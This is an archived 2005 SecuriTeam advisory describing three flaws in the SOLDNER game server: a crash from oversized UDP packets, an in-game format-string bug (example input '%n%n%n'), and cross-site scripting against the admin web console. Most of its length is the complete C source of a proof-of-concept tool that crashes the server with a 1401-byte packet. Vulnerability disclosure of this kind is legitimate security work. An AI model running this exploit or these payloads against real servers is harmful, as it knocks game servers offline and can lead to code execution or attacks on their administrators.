[NT] SOLDNER Multiple Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
Date: 01/05/05
- Previous message: SecuriTeam: "[UNIX] QWikiWiki Directory Traversal Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 5 Jan 2005 16:26:49 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SOLDNER Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.wingssimulations.com> SOLDNER is "a tactical military game
developed by Wings Simulations".
Three security vulnerabilities have been discovered in SOLDNER, one allows
crashing the server, another allows to crash and possible execute
arbitrary code under the privileges of the person running the game server,
the last one allows attacking the admin of the game via a cross site
scripting vulnerability.
DETAILS
Silent Socket Termination
The bug happens when the server receives a UDP packet of 1401 or more
bytes. Once such a packet will be received it will cause the immediate
termination of the listening thread due to bad handling of the "message
too long" socket error. The termination of the socket is silent (no
warning or messages) therefore the admin cannot easily determine what is
happened.
In-game Format String:
An attacker can crash or execute arbitrary code on the game server by
simply sending a message containing the format arguments (example:
%n%n%n).
In-game Cross Site Scripting (against the admin):
The SOLDNER server has a nice web interface (listening on TCP port 7890)
useful for the remote administration of the server. This web interface
contains also a screen (chat) in which the server logs are shown including
the messages exchanged by the users. These user messages are not filtered
allowing an attacker to cause an unsuspecting admin to execute arbitrary
HTML or JavaScript code.
Exploit:
/*
by Luigi Auriemma - http://aluigi.altervista.org/poc/soldnersock.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 2048
#define PORT 20000
#define TIMEOUT 3
#define BOOMSZ 1401
#define SEND(x,y) if(sendto(sd, x, y, 0, (struct sockaddr *)&peer,
sizeof(peer)) \
< 0) std_err();
#define RECV if(timeout(sd) < 0) { \
fputs("\nError: socket timeout, no reply
received\n\n", stdout); \
exit(1); \
} \
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \
if(len < 0) std_err();
u_short crc16(u_char *data, int len);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ],
info[] =
"\x00\x00"
"\x02\x00\x00\x00\x00"
"\x0A" // size
"\x05\x00"
"\x0A" // size, same of before
"WING"
"\x00\x00" // build version (leave it empty)
"\x00";
setbuf(stdout, NULL);
fputs("\n"
"SOLDNER Secret Wars <= 30830 socket termination "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%d)]\n"
"\n", argv[0], port);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
fputs("- check server:\n", stdout);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
*(u_short *)info = crc16(info + 2, sizeof(info) - 3);
SEND(info, sizeof(info) - 1);
RECV;
if(memcmp(buff + 11, "WING", 4)) {
fputs("\nAlert: the server doesn't seem a valid Soldner server\n",
stdout);
}
printf(" Build version %d\n", ntohs(*(u_short *)(buff + 18)));
printf("\n- send BOOM packet (%d bytes)\n", BOOMSZ);
memset(buff, 0x00, BOOMSZ);
SEND(buff, BOOMSZ);
fputs("- check server again:\n", stdout);
SEND(info, sizeof(info) - 1);
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
u_short crc16(u_char *data, int len) {
u_short *p = (u_short *)data,
crc = 0;
int size = len >> 1;
while(size--) crc ^= *p++;
// this ntohs(htons) is needed for big/little endian
compatibility
if(len & 1) crc ^= ntohs(htons(*p) & 0xff00);
return(crc);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/soldnerx-adv.txt>
http://aluigi.altervista.org/adv/soldnerx-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] QWikiWiki Directory Traversal Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
